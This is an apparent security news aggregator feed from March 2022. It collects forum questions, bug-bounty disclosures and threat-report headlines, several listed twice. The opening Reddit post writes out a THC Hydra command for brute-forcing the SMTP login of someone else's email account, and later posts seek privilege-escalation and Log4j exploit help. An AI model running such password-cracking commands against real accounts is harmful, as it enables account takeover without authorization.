    Hi I was wondering if someone could give me some help with something in THC hydra. I will start by saying I am new to this so if the answer is easy and obvious sorry. I want to make sure that the syntax I am using here is correct based off the current version (9.3) . I am trying to crack the password for this mail.com email address (This is my friends account, we are practicing together) This is the syntax I am using (This is not the real account obviously) hydra -1 suchandsuch@mail.com -x 8:12:aA1 smpts://smtp.mail.com I want the password to include upper case and lowercase as well as number. I also would like for symbols to be included and I don't know the character for that. Lastly I am not sure if the last part is correct? Thank you in advance for any help you can provide I greatly appreciate it. submitted by /u/jigentsu [link] [comments]
  • Open

    Windows Event Log Evasion Review
    Before I kick this blog post off, I'd like to thank Lina L for her excellent work in developing and sharing her work, both on Twitter, as well as in a blog post. Both are thoughtful, cogent, and articulate. In her blog post, Lina references detection techniques, something that is extremely important for all analysts to understand. What Lina is alluding to is the need for analysts to truly understand their tools, and how they work. Back around 2007-ish, the team I was on had several members (myself included) certified to work PCI forensic investigations. Our primary tool at the time for scanning acquired images and data for credit card numbers (CCNs) was EnCase (at the time, a Guidance Software product)...I believe version 6.19 or thereabouts. We had a case where JCB and Discover cards were…

  • Open

    Tetanus - Mythic C2 Agent written in Rust
    submitted by /u/hackerbby [link] [comments]
    Countering threats from North Korea
    submitted by /u/dmchell [link] [comments]
    The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en
    submitted by /u/dmchell [link] [comments]
    Log4j CVE-2021-44228
    Hi all! I'm making an assignment for my university which consists in executing a pentest on a docker. By scanning with nessus I found a Log4j vulnerability and I'm trying to get the PoC of it. I searched on the web but I didn't find any interesting info about how to do that. Anyone has got some ideas? According to nessus, it seems to be related to LDAP service. (vulnerability got found on tcp port 80) https://preview.redd.it/m4vk6psk6bp81.png?width=1345&format=png&auto=webp&s=6d0e5541c4aa627f4c610943d185342a7c269909 submitted by /u/_1NiCk1_ [link] [comments]
  • Open

    21 Best Kali Linux Tools for Hacking and Penetration Testing
    There are several types of tools that comes pre-installed. If you do not find a tool installed, simply download it and set it up. It’s… Continue reading on Medium »
    You need to know this ZAP/Burp trick if you do mobile testing
    Did you know you can use multiple proxies in burp and zap? Continue reading on System Weakness »
    You need to know this ZAP/Burp trick if you do mobile testing
    Did you know you can use multiple proxies in burp and zap? Continue reading on Medium »
    FRUSTRATED FROM BUG HUNTING WHEN YOU CAN’T FIND BUG
    HELLO READERS , Continue reading on Medium »
    One Month Bug Bounty Journey Update
    My goal with this is to explain some of my thoughts and how they changed as I progressed and how I modified my path along the way. For we… Continue reading on Medium »
    Instagram and Facebook Account Takeover if another user account is logged into your system/mobile
    Hi, I'm Praveen Kumar, let's start with how we can take complete takeover and access to other Facebook and Instagram accounts if it's… Continue reading on Medium »
    Hacking Security Ebooks
    👉Comment on any broken links or requests for books. 👉Follow me on Twitter:https://twitter.com/root_babu 👉Follow me on… Continue reading on Medium »
    A curated list of various bug bounty tools
    Contents Continue reading on Medium »
    Information Gathering: Concept, Techniques and Tools explained
    Information Gathering means gathering different kinds of information about the target. It is basically, the first step or the beginning… Continue reading on Medium »
    Facebook bug bounty: Part- 1 Expectation vs Reality
    I have already written some reports on bugreader you can check here. Continue reading on Medium »
    What “if” I can get more reward?
    An imcomplete if logic that leads to a catastrophic loss. Continue reading on Medium »
  • Open

    Impersonation of tiktok account via Broken Link in TikTok Newsroom
    TikTok disclosed a bug submitted by bushidobrown200: https://hackerone.com/reports/1504294
    Time-of-check to time-of-use vulnerability in the std::fs::remove_dir_all() function of the Rust standard library
    Internet Bug Bounty disclosed a bug submitted by hkratz: https://hackerone.com/reports/1520931 - Bounty: $4000
    Improper Authentication via previous backup code login
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1485788 - Bounty: $250
  • Open

    Does disabling an account remove the Account Authorization?
    A small team at work is going through NIST 800-53 Rev5 to map our work policies and procedures to NIST frameworks, identifying gaps and proposing changes. We did this with NIST CSF last year and found it useful, so we are now continuing on with 800-53. Currently, a coworker and I have a debate that I am going to lose, but would like to see if anyone smarter than me can provide a solid rebuttal. Here is the setup. We are determining if policy related to disabling or deleting an account maps to this control: AC-2d.3. Access authorizations (i.e., privileges) and [Assignment: organization-defined attributes (as required)] for each account; My argument is: Disabling an account disables the ability to authenticate to the account, but does not remove the previous authorization to the account. If someone subsequently enabled the account, the authorization would already exist, as its authorization did not change. Thus, policy around disabling an account is not considered for AC-2d.3. Deleting an account removes the account from the identity directory, which would also remove it from any authorizations associated with that account (assuming, of course, you have properly authorized the account using a tool that would also remove that authorization). Creating a new account with the same authorization would require authorizing the new account with the same authorization as the deleted account. Thus, policy around deleting an account is considered for AC-2d.3. My coworker says they have an argument for me that has worked with auditors. I have a week to find a rebuttal that will hold water. submitted by /u/dmburl [link] [comments]
    MacOS Trustd and China
    Apologies in advance - this is a double post (I originally posted it in the macOS community and someone suggested I post it here as well). I have Little Snitch (LS) running on my M1 MacBook Pro. Periodically, I will check the LS Network Monitor to see where traffic is going. Today, I noticed that there were 4 connections to mainland China and all were trustd\apple.com\ocsp2.apple.com What is interesting to me is: I also have a separate (with the gear symbol) trustd\apple.com\oscp2.apple.com connecting to locations in the US. I've never had trustd connecting to China. Anyone else, not based in China, have Little Snitch and can check to see if they have connections going to China with trustd? Little Snitch shows one of the China trustd IP addresses as: 110.188.2.1. The organisation owning this IP address is China Telecom Sichuan. The other 3 are: 111.43.160.66 112.92.99.203 120.240.74.66 The US based trustd IP addresses are mostly 17.253.127.xxx, which are Apple owned (I think). FYI - per Little Snitch: "Trust Daemon" is a macOS system process that is responsible for evaluating the validity of digital certificates that are used for encryption and security features. "trustd" connects to the servers of several certificate authorities to evaluate the validity of digital certificates. If you deny these connections apps on your computer may not be able to connect to serves on the Internet. submitted by /u/idid2reddit [link] [comments]
    Open Source API Security Tools
    Looking to add protections for web application APIs. Are there any good Open source API security tools? submitted by /u/Calm_Scene [link] [comments]
    Trying to bypass this sudoers file thing, need help!
    https://ibb.co/1byT2pm I'm just learned about dirty pipe vulnerability but unable to get root access albeit this machine is vulnerable to dirty pipe but the guy who set up this machine has removed user from sudoers file, even more, I'm not able to edit sudoers file idk why, Does anyone have any idea about how to bypass this filter and get root access by privilege escalation? Pls help submitted by /u/The_Intellectualist [link] [comments]
    Meta-Sploit ILITIES
    I am scanning a website with nmap, I get this type of output: https://vulners.com/metasploit/MSF:ILITIES/blahblah/blahblah but there is no ILITIES module? I tried googling it and I got nothing. Anyone has any tips/solutions? submitted by /u/NSA-cat [link] [comments]
  • Open

    A quick reminder: Don't stress on both threat and vulnerability
    Article URL: https://techkettle.blogspot.com/2022/03/a-quick-reminder-dont-stress-on-both.html Comments URL: https://news.ycombinator.com/item?id=30795327 Points: 1 # Comments: 0
  • Open

    Threat Brief: Lapsus$ Group
    The Lapsus$ Group grew from launching a handful of destructive attacks to stealing and publishing source code of top-tier technology companies. The post Threat Brief: Lapsus$ Group appeared first on Unit42.
    2022 Unit 42 Ransomware Threat Report Highlights: Ransomware Remains a Headliner
    2022 Unit 42 Ransomware Threat Report highlights include average ransom demands and payments and new developments in double extortion and RaaS. The post 2022 Unit 42 Ransomware Threat Report Highlights: Ransomware Remains a Headliner appeared first on Unit42.
  • Open

    Another vulnerability in the LPC55S69 ROM
    submitted by /u/mckirk_ [link] [comments]
    Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
    submitted by /u/digicat [link] [comments]
    CVE-2022-24415, CVE-2022-24416, CVE-2022-24419, CVE-2022-24420, CVE-2022-24421 : New Dell BIOS Bugs Affect Millions of Inspiron, Vostro, XPS, Alienware Systems
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Lateral Movement: WebClient Workstation Takeover
    Introduction The article is based on @tifkin_’s idea that a workstation takeover, also known as lateral movement, is possible by abusing WebDAV shares. In Certified The post Lateral Movement: WebClient Workstation Takeover appeared first on Hacking Articles.
  • Open

    Lateral Movement: WebClient Workstation Takeover
    Introduction The article is based on @tifkin_’s idea that a workstation takeover, also known as lateral movement, is possible by abusing WebDAV shares. In Certified The post Lateral Movement: WebClient Workstation Takeover appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-03-24 Review
    OpenCTI入门笔记(一):搭建框架和导入数据 by ourren 基于LSTM的二进制代码相似性检测 by ourren 漏洞情报:为什么、要什么和怎么做 by ourren 浅谈模糊测试基础技术——引导机制 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-24 Review
    OpenCTI入门笔记(一):搭建框架和导入数据 by ourren 基于LSTM的二进制代码相似性检测 by ourren 漏洞情报:为什么、要什么和怎么做 by ourren 浅谈模糊测试基础技术——引导机制 by ourren 更多最新文章,请访问SecWiki
  • Open

    is it possible to scan a smart assistant such as an alexa or google home for evidence
    hi im writing a paper on forensic acquisition of smart assistants and i was wondering is there any way to scan and view files from an alexa submitted by /u/bradfordranger5 [link] [comments]
  • Open

    Medium > LinkedIn
    Imma post interesting things about the Ten Million Dollar Home Page (xmdhp.com) here. Follow me to the top. I ❤️ Medium. Continue reading on Medium »
  • Open

    4月8日 | FreeBuf云安全主题公开课开启报名
    4月8日FreeBuf云安全主题公开课开启报名,来看看有哪些心动课程吧!
    FBI提醒美国能源公司警惕来自俄罗斯的网络攻击
    FBI日前对美国能源公司发出警告,称与俄罗斯相关的攻击者可能正针对其部署网络攻击。
    零信任威胁隔离防护 让企业更贴近安全合规监管
    党的十八大以来,党中央高度重视网络安全和信息化工作。
    FreeBuf早报 | 欧盟警告卫星通信网络恐受威胁;乌克兰企业遭受DoubleZero攻击
    安全研究公司 ASEC 发现网络上近期出现了一种新的恶意软件大肆传播,它会伪装成以 Windows 激活工具的形式,但实际上是 BitRAT 远程访问木马。
    全球超过200,000台MicroTik路由器受到僵尸网络恶意软件的控制
    近期,专家表示受僵尸网络控制的MicroTik路由器是他们近年来看到的最大的网络犯罪活动之一。
    中央网信办等12部门联合印发IPv6技术创新和融合应用试点名单
    通知指出,经地方和相关部门组织推荐、专家评审及复核、网上公示等程序,确定了22个综合试点城市和96个试点项目。
    黑吃黑!黑客通过推送虚假恶意软件从同行手中窃取信息
    两家安全公司的分析师发现黑客间的“黑吃黑”行为,黑客通过伪装成破解 RAT 和恶意软件构建工具的剪贴板窃取器来攻击其他黑客。
    俄罗斯认为 Google News 发布虚假战争信息,限制其在境内运行
    俄罗斯禁止该国互联网访问 Alphabet 新闻聚合服务 Google News。
  • Open

    U.S Army Launches the Cyber Military Intelligence Group (CMIG)
    The U.S Army has recently announced the development and public launch of the Cyber Military Intelligence Group (CMIG) which aims to use both proprietary sources including public sources on its way to build situational awareness in the world of cyber warfare and malicious and fraudulent adversaries.An excerpt:"The CMIG’s function is to direct, synchronize and coordinate intelligence support to
    Israel Blocks Ukraine From Purchasing Pegasus Spyware
    According to the Guardian Israel blocked Ukraine from purchasing the Pegasus spyware from the infamous NSO Group vendor of lawful surveillance hacking tools.Not surprisingly this is a bit over-exaggerated and self-serving statement that actually does more PR harm other than good despite the fact that the article is mentioning Israel's "2007 Defense Export Control Act" which prevents the country
    Assessing the U.S Intelligence Community's Annual Threat Report for 2022
    In the most recently released "U.S Intelligence Community's Annual Threat Report for 2022" the U.S Intelligence Community states that China remains the U.S's most sophisticated and relevant cyber adversary which possesses the necessary sophistication to target the country both using cyber espionage and attacks against U.S critical infrastructure.An excerpt:"We assess that China presents the
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-21225(九)
    作者:Hcamael@知道创宇404实验室 时间:2022年03月16日 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(...
    利用 gateway-api 攻击 kubernetes
    作者:lazydog 原文链接:http://noahblog.360.cn/abuse-gateway-api-attack-kubernetes/ 前言 前几天注意到了 istio 官方公告,有一个利用 kubernetes gateway api 仅有 CREATE 权限来完成特权提升的漏洞(CVE-2022-21701),看公告、diff patch 也没看出什么名堂来,跟着自己感觉...
    Clipper 恶意软件伪装成 AvD 加密盗窃器
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/ 盗取信息的恶意软件正在增多。Cyble 研究实验室最近在一个网络犯罪论坛上发现了一个名为“ AvD crypto stealer”的新恶意软件。然而,经过进一步的调查,我们观察到这并不是一个加密盗窃软件。实际上,这是一个伪装的著...
    RealWorld CTF 之 qiling 框架分析
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org qiling 当时题目就给了一个qiling的使用的用例,甚至和官方文档上面的用例差不多因此肯定是库的问题。 #!/usr/bin/env python3 import os import sys import base64 import ...
    容器进程切换思考
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前置技术 Magic Link /proc/目录下存在很多的链接文件,但是在Linux 也存在一种特殊的链接文件,这种文件的大小为0,我们知道普通的链接文件的大小等于链接目标的文件路径长度,但是Magic Link的大小为0,它们在打开方式上...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-21225(九)
    作者:Hcamael@知道创宇404实验室 时间:2022年03月16日 相关阅读: 从 0 开始学 V8 漏洞利用之环境搭建(一) 从 0 开始学 V8 漏洞利用之 V8 通用利用链(二) 从 0 开始学 V8 漏洞利用之 starctf 2019 OOB(三) 从 0 开始学 V8 漏洞利用之 CVE-2020-6507(四) 从0开始学 V8 漏洞利用之 CVE-2021-30632(...
    利用 gateway-api 攻击 kubernetes
    作者:lazydog 原文链接:http://noahblog.360.cn/abuse-gateway-api-attack-kubernetes/ 前言 前几天注意到了 istio 官方公告,有一个利用 kubernetes gateway api 仅有 CREATE 权限来完成特权提升的漏洞(CVE-2022-21701),看公告、diff patch 也没看出什么名堂来,跟着自己感觉...
    Clipper 恶意软件伪装成 AvD 加密盗窃器
    译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/ 盗取信息的恶意软件正在增多。Cyble 研究实验室最近在一个网络犯罪论坛上发现了一个名为“ AvD crypto stealer”的新恶意软件。然而,经过进一步的调查,我们观察到这并不是一个加密盗窃软件。实际上,这是一个伪装的著...
    RealWorld CTF 之 qiling 框架分析
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org qiling 当时题目就给了一个qiling的使用的用例,甚至和官方文档上面的用例差不多因此肯定是库的问题。 #!/usr/bin/env python3 import os import sys import base64 import ...
    容器进程切换思考
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前置技术 Magic Link /proc/目录下存在很多的链接文件,但是在Linux 也存在一种特殊的链接文件,这种文件的大小为0,我们知道普通的链接文件的大小等于链接目标的文件路径长度,但是Magic Link的大小为0,它们在打开方式上...

  • Open

    Nessus + Pivot Tables
    Hello All, I'm a new security analyst at my firm. I've been introduced to Nessus and tasked with vulnerability management. I'm utilizing Excel pivot tables to organize the tremendous amounts of data. Currently, in the pivot table section for filters, I've input 'Risk' and under rows I have 'Solution & Host.' I then use Xlookup to match each host against a server list of administrators. This gives me the person to contact for the specific vulnerability. My question is how are you setting up your pivot tables? Thank you, R2G submitted by /u/Red2Green [link] [comments]
    Best app for wifi security assessments using an iphone
    I recently made the switch to Apple from Samsung (S9+ and S22+). Too many issues with Samsung right now. I am looking for replacement apps that can be used on Iphone. Wifi collector https://play.google.com/store/apps/details?id=net.nirsoft.wificollector Network Scanner https://play.google.com/store/apps/details?id=com.myprog.netscan NetworkMapper https://github.com/kost/networkmapper (basically nmap) ​ I know that there may not be a one for one but I am looking for recommendations on what people are using on the iPhone front. Yes, I have looked in the apple store but would to hear from people. Sorry is this broke a rule. submitted by /u/Quickbreach [link] [comments]
    How to approach Burp Suite academy and certification
    Hello folks, I currently study web vulnerabilities on Burp Suite academy with the next opportunity to pass the certification exam as well as gain skills and understanding for OWASP TOP 10 vulnerabilities testing for the future job. The question is how to make notes that helped me in the job/certification exam? I literally copy the whole page text to my Obsidian editor... Just don't want to lose some information that causes me to misunderstand something. It is like a whole Burp Academy website in my Obsidian, just without pictures, this probably makes no sense as I can not find or define needed information for vulns finding and exploitation. (just a bunch of info: what vulnerability is about, how it impact a business, types of vulns, etc. ) I want to make like cheatsheet for myself based on the content regarding vulnerabilities identification/testing/exploitation, that helps me in an exam environment and the real world. Any tips are appreciated, thank you in advance. submitted by /u/TRYH0 [link] [comments]
    The best Netsec field for freelancing ?
    What would be the best field in cybersecurity to specialize in for someone who wants to work as a freelance ? Thank you for your input and have a wonderful day submitted by /u/No-Lead497 [link] [comments]
    Knowing what website leaves the 2FA cookie to know what to keep.
    There are various websites sites that use 2FA, and I think do not need the 2FA email if the remember-this-computer cookie has been saved. I delete most cookies, but I keep ones that I list for the purpose. In chrome I use Cookie AutoDelete. My question is, how do I know what website leaves the cookie that I want to save. It presumably is not the domain of my financial institution, because I retain those cookies when trying to do this. ​ I wish I could tell what cookie(s) got introduced after doing the 2FA entering of the code. Then I would know what cookie domain to save. I cannot figure it out for any of my browsers -- Chrome, Edge, FireFox, Avast, and even Internet Explorer. Any guidance for me? Thanks. ​ This thread is somewhat related, but not quite. submitted by /u/Apt_ferret [link] [comments]
    Any introductory links on how to build rules for untangle NG Firewall?
    Hello there.... Noob here looking for tips/links on how to build rules for untangle NG Firewall. I have installed the untangle Firewall and as it seems I am missing something obvious and can't wrap my head around creating the FW rules suitably for my network. I started off by blocking everything as the "last" rule and by allowing stuff that seemed obvious to me as the earlier layers of rules. However, there seems to be a lot of traffic on funny ports by my zoo of different equipment (cameras, mobile devices, cleaning robot, etc.) for example in the port 5xxx range. Therefore, I have tried to search for some help for noobs on how to evaluate what's there and what's essential to keep open beyont the 80/443 TCP and 53 UDP range but haven't been able to identify something like the condensed notes of rule-creation. Need to recon what's there and don't seem to be able to identify it. I'd be absolutely thrilled, if anyone could let me know if they have a link on how to start creating suitable rules for a small SOHO network: I have no VLANs or DMZ Firewall lives between router and a Ubiquiti managed switch two AP by Ubiquiti connected to the managed switch several computers (Linux, Mac, Win10), two printers, several mobile devices, cams, vacuum-cleaner-robot on the network, SONOS EVE home appliances messaging apps (Whatsapp, Signal Telegram, Threema,... ) in use, email with different providers Need no HTTP/HTTPS traffic enter my network from the outside VPN on an uncommon port no uPNP outside the SOHO network So it doesn't seem to be a big issue technically, but I might be mistaken. Any pointer is highly appreciated! submitted by /u/azarot5555 [link] [comments]
    Emails I didn't send in my sent folder?
    Apologies if this is the wrong sub for this, if there's a better place please let me know. I found this in my "sent" folder on gmail, but I don't know where it came from. I did click on a gmail suggested "unsubscribe" link recently, like in the third pic (not that exact one, I don't remember which or when). I don't imagine clicking such a link would send an email like that. Searching for the address it was sent to in my email just brings the pictured email up. Anyone have an idea of what's going on here? Images: https://slack-files.com/TBEMPBASH-F0385DN63QV-ac613bd467 https://slack-files.com/TBEMPBASH-F0381LD0CNS-2eb1d038e6 https://slack-files.com/TBEMPBASH-F0385E6J6UV-68e5bc7aa6 submitted by /u/pissing_on_the_lawn [link] [comments]
    Sniffing packets through hotspot
    If a laptop provides hotspot for another device, how can we inspect the traffic of connected device on the laptop? If wireshark is the answer then what interface should be selected? The wifi interface is having too many redundant packets from other devices too. Please share your suggestions. submitted by /u/Fantastic_Sperm [link] [comments]
    What data formats are vulnerable to batching attacks outside of graphql?
    Batching attacks is basically where you can put multiple user and pass params in the same request with different values and the server can check them all bypassing rate limits and lockout policies. What im wondering is what other technologies or data formats by their very implementation also allows for this behavior outside of graphql. I believe old SOAP apis can support batch requests encapsulated in the xml. Another is potentially multipart form data type request although I never tested if batching is possible on thes. submitted by /u/Academic-Discount252 [link] [comments]
  • Open

    Ukraine — Point de situation au 24 mars
    Les dernières 24h Continue reading on Medium »
    Biały wywiad OSINT — sposób na pozyskiwanie danych z sieci
    Co to jest biały wywiad? Czy przedsiębiorca lub pracownik firmy może go samodzielnie przeprowadzić? Biały wywiad OSINT polega na zbieraniu… Continue reading on Blog Transparent Data »
    OSINT Methodology and Tradecraft: Tips for Winning The Trace Labs Black Badge from Team Federal…
    INTRODUCTION Continue reading on Medium »
  • Open

    TrustedSec Okta Breach Recommendations
    TrustedSec’s Incident Response Team sent urgent communications to all IR retainer clients after the discovery of the compromise of Okta. Below are the recommendations provided with additional updates after reviewing more information on 03/23/2022. On March 22, 2022, the threat group LAPSUS$ announced a successful compromise of Okta, a heavily used identity and access management... The post TrustedSec Okta Breach Recommendations appeared first on TrustedSec.
  • Open

    Proxy: Accessing Network Connection
    No content preview
    The mystery of SQLMap’s --eval
    No content preview
    Authentication bypass using root array
    No content preview
  • Open

    Proxy: Accessing Network Connection
    No content preview
    The mystery of SQLMap’s --eval
    No content preview
    Authentication bypass using root array
    No content preview
  • Open

    Proxy: Accessing Network Connection
    No content preview
    The mystery of SQLMap’s --eval
    No content preview
    Authentication bypass using root array
    No content preview
  • Open

    I've heard someone here might be interested in virus(ransomware) samples. I'd like to know what this is or what to do about it.
    submitted by /u/TarnaBar [link] [comments]
    Large-scale npm attack targets Azure developers with malicious packages
    submitted by /u/SRMish3 [link] [comments]
    GitHub - Developers Support Ukraine
    submitted by /u/ssh-mitm [link] [comments]
    LTrack: Stealthy Tracking of Mobile Phones in LTE
    submitted by /u/rbarkley [link] [comments]
    Microsoft: DEV-0537 (LAPSUS$) criminal actor targeting organizations for data exfiltration and destruction
    submitted by /u/momothereal [link] [comments]
  • Open

    A Detailed Guide on Crunch
    Introduction Often times attackers have the need to generate a wordlist based on certain criteria which are required for pentest scenarios like password spraying/brute-forcing. Other The post A Detailed Guide on Crunch appeared first on Hacking Articles.
  • Open

    A Detailed Guide on Crunch
    Introduction Often times attackers have the need to generate a wordlist based on certain criteria which are required for pentest scenarios like password spraying/brute-forcing. Other The post A Detailed Guide on Crunch appeared first on Hacking Articles.
  • Open

    What if…
    … Your IdP is breached Continue reading on Neuvik »
  • Open

    SecWiki News 2022-03-23 Review
    Windows驱动签名经验贴 by yunshanwuyin 初探Shellcode免杀 by yunshanwuyin 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-23 Review
    Windows驱动签名经验贴 by yunshanwuyin 初探Shellcode免杀 by yunshanwuyin 更多最新文章,请访问SecWiki
  • Open

    Multiple ways to find sql and cheatsheet
    Comments out rest of the query.  Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing… Continue reading on Medium »
    Information Disclosure Bug
    Web security Continue reading on Medium »
    How I Was Able To TakeOver Any Account On One Of Europe's Largest Media Companies
    Welcome back, I have not produced a writeup in over a week due to hunting for further vulnerabilities on Hall Of Fame sites, many of which… Continue reading on Medium »
    My Pentest Log -11- (CSRF in ASP)
    Greetings everyone from the Basilica, Continue reading on Medium »
    Zenlink Partners with Immunefi and Launches Bug Bounty
    March 23, 2022 — We are pleased to announce that Zenlink has partnered with Immunefi and launched a bug bounty program. Continue reading on Zenlink Foundation Ltd. »
    Supply Chain Attacks: A ripe area for research
    Let’s discuss about Supply Chain Attacks and why it’s a great research area in the recent times. Continue reading on Pentester Academy Blog »
    No Rate Limit at Reset Password Endpoint can Lead to account takeover (APPLE CORP)
    In The First This is my first writeup so forgive for anything or any mistake or you can send to me to share your knowledge or increase… Continue reading on Medium »
  • Open

    Bypassing domain deny_list rule in Smokescreen via trailing dot leads to SSRF
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1410214 - Bounty: $1500
    XSS Reflected at https://sketch.pixiv.net/ Via `next_url`
    pixiv disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1503601 - Bounty: $500
  • Open

    Operation Dragon Castling: APT group targeting betting companies - Avast Threat Labs
    submitted by /u/dmchell [link] [comments]
  • Open

    Another Vulnerability in the LPC55S69 ROM
    Article URL: https://oxide.computer/blog/another-vulnerability-in-the-lpc55s69-rom Comments URL: https://news.ycombinator.com/item?id=30778778 Points: 137 # Comments: 46
  • Open

    戴尔曝出五大漏洞,影响数百万 Inspiron、Vostro、XPS、Alienware 系统
    戴尔BIOS存在五个新的安全漏洞,如果这些漏洞被黑客利用,可能会导致在易受攻击的系统上执行代码。
    FreeBuf早报 | 黑客泄露37GB微软源代码;白宫共享应对俄网络攻击清单
    黑客组织泄露了微软37GB的源代码,这些代码与包括Bing和Cortana在内的数百个项目有关。
    斗象科技CEO谢忱:中美网安市场分化明显,“平行宇宙”初现
    一个独特的、平行于海外的“中国网安宇宙”已经显现。
    NFC竟也存在高危漏洞?看他如何分析(CVE-2021-0870)
    NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片固件和主机NFC子系统都是远程代码执行(RCE)攻击的目标。
    《DRP数字风险防护2021年度报告》重磅发布
    正确地应对数字化转型风险,可以让企业充分利用数字化转型技术,真正享受到数字化转型所带来的收益。
    Okta正在调查遭Lapsus$组织勒索的数据泄露事件
    身份验证服务和身份与访问管理(IAM)解决方案领先提供 Okta近期表示,他们正在调查遭勒索的数据泄露事件。
    ELTA 遭受勒索软件攻击,希腊公共邮政服务下线
    希腊国有邮政服务供应商 ELTA 遭到勒索软件攻击,使其大部分服务处于离线状态。
    微软确认遭Lapsus$ 勒索组织入侵
    微软已经确认他们的一名员工受到了 Lapsus$ 黑客组织的入侵,使得黑客访问和窃取了他们的部分源代码。
    雀巢遭Anonymous组织攻击 致10GB敏感资料外泄
    近日,国际黑客组织“匿名者”(Anonymous)宣布,他们成功攻击了雀巢公司。
    乱杀之你的密钥被我看见了
    知识多多益善。
    揭秘!女主播和男运营的那些“公关”套路
    近些年来,直播经济迅猛发展,催生了一大批网红主播。
    百行征信有限公司招聘安全管理岗
    诚招安全管理岗(初级-中级),央行直属、六险两金、人才住房、包两餐。
    SaaS间连接可能成为网络安全的重大威胁
    当前要解决的最大挑战是缺乏对用户活动和数据的可见性,其次是了解所有正在使用的SaaS应用程序并进行统一管理。
  • Open

    Anatomy of a Ghost CVE
    Article URL: https://daniel.haxx.se/blog/2022/03/23/anatomy-of-a-ghost-cve/ Comments URL: https://news.ycombinator.com/item?id=30776755 Points: 16 # Comments: 0
  • Open

    Random Stuff (Mac SW, Wallpapers, Images)
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    深入理解反射式 dll 注入技术
    作者:深信服千里目安全实验室 原文链接:https://mp.weixin.qq.com/s/kVpesy_w7XLanL_WhRhn-Q 一、前言 dll注入技术是让某个进程主动加载指定的dll的技术。恶意软件为了提高隐蔽性,通常会使用dll注入技术将自身的恶意代码以dll的形式注入高可信进程。 常规的dll注入技术使用LoadLibraryA()函数来使被注入进程加载指定的dll。常规d...
    Storm Cloud 黑客卷起大风暴:恶意软件 GIMMICK 攻击 MacOS
    译者:知道创宇404实验室翻译组 原文链接:https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ 2021年底,Volexity 发现了一起入侵事件,发生在网络安全监控服务的局部环境。Volexity 检测到一个运行frp的系统,或称为快速反...
  • Open

    深入理解反射式 dll 注入技术
    作者:深信服千里目安全实验室 原文链接:https://mp.weixin.qq.com/s/kVpesy_w7XLanL_WhRhn-Q 一、前言 dll注入技术是让某个进程主动加载指定的dll的技术。恶意软件为了提高隐蔽性,通常会使用dll注入技术将自身的恶意代码以dll的形式注入高可信进程。 常规的dll注入技术使用LoadLibraryA()函数来使被注入进程加载指定的dll。常规d...
    Storm Cloud 黑客卷起大风暴:恶意软件 GIMMICK 攻击 MacOS
    译者:知道创宇404实验室翻译组 原文链接:https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ 2021年底,Volexity 发现了一起入侵事件,发生在网络安全监控服务的局部环境。Volexity 检测到一个运行frp的系统,或称为快速反...
  • Open

    road map
    to the kind people, can someone please create a computer forensics road map for beginners? mentioning the os types, the tools? the resources to learn and find practice material? submitted by /u/ItchyPilot9804 [link] [comments]
    Portscanning and malware in Encase8
    Hello all! I was hoping to see if anyone could help me with a school project I'm working on that has me a bit lost in the woods. We just learned about portscanning and malware in class but unlike many of our other classes we did not do a lab to help us understand the process required to gather the information. The assignment gave us two forensically imaged drives, one was the source of the alleged attack (a student) and the 'victim' was another (the teacher). I have my suspicions (based on the class) that the scan was not malicious but the product of a malware attack through open ports, but that's what I want to find out! I just started using encase8 (moved from encase6), so my proficiency is abysmal currently with the new UI. For those who have experience out there, what should I be looking at first? programs to use that may be better than encase (and free)? My gut says to try and find programs of execution and build a timeline. What should I be looking at? svchost.exe? AppData? ShimCache? (probably all of these but to be honest I don't know what I'm looking for because I don't know where to start) What does evidence of portscanning 'look' like? submitted by /u/SkitzTheFritz [link] [comments]

  • Open

    Hacking, Spyware & The Internet of Things
    In September 2021, my iPhone was remotely wiped after glitching for a few weeks. The phone was given to me by my ex who I currently have an order of protection against arising from a domestic violence incident in March of 2020. He always knew things he shouldn’t have but I thought he was physically going through my phone but realized after this happened that a few instances would have required remote access. My order of protection expires in less than 2 weeks and I need help. He is not technologically savvy but owns several companies with internal IT Departments and has the financial resources to do most of what is possible in the world of tech stalking and hacking. Within 2 days of my phone being wiped, every one of my accounts was hacked (except my gmail that had my Mother’s phone numb…
    Anyone know how to add a new root certificate into the 'Brave' browser?
    I need to MitM myself for a personal project. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]
    Would you / Do you use a virtualized firewall on the Cloud? What are the benefits?
